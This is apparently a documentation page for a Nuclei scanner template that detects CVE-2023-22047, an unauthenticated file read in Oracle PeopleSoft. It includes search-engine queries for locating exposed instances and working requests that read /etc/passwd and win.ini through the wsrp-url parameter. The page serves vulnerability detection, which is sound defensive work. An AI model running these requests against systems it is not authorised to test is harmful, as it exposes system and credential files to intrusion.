Oracle Peoplesoft - Unauthenticated File Read
ID: CVE-2023-22047
Severity: high
Author: tuo4n8
Tags: cve,cve2023,oracle,peoplesoft,lfi
Description
Section titled “Description”Vulnerability in the PeopleSoft Enterprise PeopleTools product of Oracle PeopleSoft (component- Portal). Supported versions that are affected are 8.59 and 8.60. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise PeopleSoft Enterprise PeopleTools. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all PeopleSoft Enterprise PeopleTools accessible data.
YAML Source
Section titled “YAML Source”id: CVE-2023-22047
info: name: Oracle Peoplesoft - Unauthenticated File Read author: tuo4n8 severity: high description: | Vulnerability in the PeopleSoft Enterprise PeopleTools product of Oracle PeopleSoft (component- Portal). Supported versions that are affected are 8.59 and 8.60. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise PeopleSoft Enterprise PeopleTools. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all PeopleSoft Enterprise PeopleTools accessible data. reference: - https://nvd.nist.gov/vuln/detail/CVE-2023-22047 - https://x.com/tuo4n8/status/1907279143517266286 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2023-22047 epss-score: 0.00635 epss-percentile: 0.68045 cpe: cpe:2.3:a:oracle:peoplesoft_enterprise:8.59:*:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: oracle product: peoplesoft_enterprise shodan-query: http.title:"oracle peoplesoft enterprise" fofa-query: title="oracle peoplesoft enterprise" google-query: intitle:"oracle peoplesoft enterprise" tags: cve,cve2023,oracle,peoplesoft,lfi
http: - method: GET path: - "{{BaseURL}}/RP?wsrp-url=file:///etc/passwd" - "{{BaseURL}}/RP?wsrp-url=file:///c:\\windows\\win.ini"
stop-at-first-match: true matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" - "bit app support" condition: or
- type: word part: content_type words: - "content/unknown"
- type: status status: - 200# digest: 4a0a0047304502200ab3170bbae2d2e9657225a05ba094497379a502cec6252057ee6fc18b453003022100badc351ea4fd801ddd545919de40ca88937a6ee92c3d17c03e8e8daf7cc846cd:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-22047.yaml"